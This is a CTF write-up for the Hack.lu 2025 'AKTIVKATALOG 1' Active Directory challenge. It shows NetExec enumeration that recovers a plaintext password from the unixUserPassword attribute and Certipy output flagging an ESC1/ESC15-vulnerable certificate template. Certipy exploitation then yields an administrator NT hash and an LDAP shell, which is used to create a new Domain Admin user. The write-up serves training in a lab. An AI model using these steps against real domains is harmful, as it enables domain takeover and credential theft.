AKTIVKATALOG 1 is an Active Directory challenge from Hack.lu CTF 2025, created by NeffIsBack and Steffen. It involves enumerating the unixUserPassword attribute and ADCS
Note
My NetExec version is the latest, I installed it using:
1 2 3 4 5 6 7 8 9 10 11 12 13 14
➜ tools git clone https://github.com/Pennyw0rth/NetExec ➜ tools cd NetExec ➜ NetExec git:(main) ✗ python3 -m pipx install . --force Installing to existing venv 'netexec' installed package netexec 1.4.0+1009.3d407b47, installed using Python 3.12.3 These apps are now globally available - NetExec - netexec - nxc - nxcdb done! ✨ 🌟 ✨
Running netexec with the --users and --shares flags doesn’t show anything suspicious. However, we can use the --computers flag to enumerate domain computers
As you can see, we have the DC01$ account and another computer account called dator$. There’s an LDAP attribute called unixUserPassword that is sometimes populated with plaintext credentials. To enumerate it, we can use the get-unixUserPassword module from netexec, which in this case returns the computer account’s password
One important thing to check in an Active Directory environment is ADCS (Active Directory Certificate Services). Let’s use the adcs module from netexec to see if it’s in use
Indeed, ADCS is present here. The next step is to look for vulnerable templates using tools like Certipy. Netexec recently added a new module called certipy-find that works like the certipy find command to look for vulnerable templates
[*] Finding certificate templates [*] Found 34 certificate templates [*] Finding certificate authorities [*] Found 1 certificate authority [*] Found 12 enabled certificate templates [*] Finding issuance policies [*] Found 14 issuance policies [*] Found 0 OIDs linked to templates [*] Retrieving CA configuration for'hack-DC01-CA' via RRP [*] Successfully retrieved CA configuration for'hack-DC01-CA' [*] Checking web enrollment for CA 'hack-DC01-CA' @ 'DC01.hack.lu' [!] Error checking web enrollment: [Errno 104] Connection reset by peer [!] Use -debug to print a stacktrace [*] Enumeration output: Certificate Authorities 0 CA Name : hack-DC01-CA DNS Name : DC01.hack.lu Certificate Subject : CN=hack-DC01-CA, DC=hack, DC=lu Certificate Serial Number : 49A6DF796B66B08746F83C67B8A882D3 Certificate Validity Start : 2025-10-08 14:46:23+00:00 Certificate Validity End : 2030-10-08 14:55:34+00:00 Web Enrollment HTTP Enabled : False HTTPS Enabled : False User Specified SAN : Disabled Request Disposition : Issue Enforce Encryption for Requests : Enabled Active Policy : CertificateAuthority_MicrosoftDefault.Policy Permissions Owner : HACK.LU\Administrators Access Rights ManageCa : HACK.LU\Administrators HACK.LU\Domänadministratörer HACK.LU\Företagsadministratörer ManageCertificates : HACK.LU\Administrators HACK.LU\Domänadministratörer HACK.LU\Företagsadministratörer Enroll : HACK.LU\Authenticated Users Certificate Templates 0 Template Name : köttbullar Display Name : köttbullar Certificate Authorities : hack-DC01-CA Enabled : True Client Authentication : True Enrollment Agent : False Any Purpose : False Enrollee Supplies Subject : True Certificate Name Flag : EnrolleeSuppliesSubject Enrollment Flag : AutoEnrollment Extended Key Usage : Server Authentication Client Authentication Requires Manager Approval : False Requires Key Archival : False Authorized Signatures Required : 0 Schema Version : 1 Validity Period : 1 year Renewal Period : 6 weeks Minimum RSA Key Length : 2048 Template Created : 2025-10-08T14:59:46+00:00 Template Last Modified : 2025-10-08T14:59:46+00:00 Permissions Enrollment Permissions Enrollment Rights : HACK.LU\Domändatorer Object Control Permissions Owner : HACK.LU\Företagsadministratörer Full Control Principals : HACK.LU\Domänadministratörer HACK.LU\Local System HACK.LU\Företagsadministratörer Write Owner Principals : HACK.LU\Domänadministratörer HACK.LU\Local System HACK.LU\Företagsadministratörer Write Dacl Principals : HACK.LU\Domänadministratörer HACK.LU\Local System HACK.LU\Företagsadministratörer [+] User Enrollable Principals : HACK.LU\Domändatorer [!] Vulnerabilities ESC1 : Enrollee supplies subject and template allows client authentication. ESC15 : Enrollee supplies subject and schema version is 1. [*] Remarks ESC15 : Only applicable if the environment has not been patched. See CVE-2024-49019 or the wiki for more details. ESC2 Target Template : Template can be targeted as part of ESC2 exploitation. This is not a vulnerability by itself. See the wiki for more details. Template has schema version 1. ESC3 Target Template : Template can be targeted as part of ESC3 exploitation. This is not a vulnerability by itself. See the wiki for more details. Template has schema version 1.
As you can see from the output of both tools, the köttbullar template is vulnerable to ESC1 and ESC15. In this writeup we will exploit both
ESC1
certipy wiki is a nice place to find more information about ESC1 and the commands to exploit it. I also created a cheatsheet for ADCS that includes all the commands to exploit each escalation. More ADCS resources are listed in the resources section at the end of this writeup
[*] Requesting certificate via RPC [*] Request ID is 5 [*] Successfully requested certificate [*] Got certificate with UPN 'Administrator' [*] Certificate object SID is 'S-1-5-21-215134972-1129381140-2588549801-500' [*] Saving certificate and private key to 'administrator.pfx' [*] Wrote certificate and private key to 'administrator.pfx'
1 2 3 4 5 6 7 8 9 10 11 12 13 14
➜ certipy auth -pfx administrator.pfx -domain hack.lu -u 'administrator' -dc-ip 10.244.0.10 Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities: [*] SAN UPN: 'Administrator' [*] SAN URL SID: 'S-1-5-21-215134972-1129381140-2588549801-500' [*] Security Extension SID: 'S-1-5-21-215134972-1129381140-2588549801-500' [*] Using principal: 'administrator@hack.lu' [*] Trying to get TGT... [*] Got TGT [*] Saving credential cache to 'administrator.ccache' [*] Wrote credential cache to 'administrator.ccache' [*] Trying to retrieve NT hashfor'administrator' [*] Got hashfor'administrator@hack.lu': aad3b435b51404eeaad3b435b51404ee:a6b9330f65063062dc3d567db7d4e695
With the Domain Administrator hash in hand, we can grab our flag located in C:\Users\Administratör\Desktop\flag.txt
[*] Requesting certificate via RPC [*] Request ID is 6 [*] Successfully requested certificate [*] Got certificate with UPN 'administrator@hack.lu' [*] Certificate object SID is 'S-1-5-21-215134972-1129381140-2588549801-500' [*] Saving certificate and private key to 'administrator.pfx' [*] Wrote certificate and private key to 'administrator.pfx'
1 2 3 4 5 6 7 8 9 10 11 12 13
➜ certipy auth -pfx administrator.pfx -dc-ip 10.244.0.10 -ldap-shell Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities: [*] SAN UPN: 'administrator@hack.lu' [*] SAN URL SID: 'S-1-5-21-215134972-1129381140-2588549801-500' [*] Security Extension SID: 'S-1-5-21-215134972-1129381140-2588549801-500' [*] Connecting to 'ldaps://10.244.0.10:636' [*] Authenticated to '10.244.0.10' as: 'u:HACK\\Administratör' Type helpfor list of commands
# whoami u:HACK\Administratör
With this ldap shell we can do a lot. The easiest way is to create a new user and add them to the domain admins (sorry I mean Domänadministratörer) group
1 2 3 4 5 6
# add_user serioton Attempting to create user in: %s CN=Users,DC=hack,DC=lu Adding new user with username: serioton and password: LyX\mX!ry]G{W;D result: OK
# add_user_to_group serioton Domänadministratörer Adding user: serioton to group Domänadministratörer result: OK
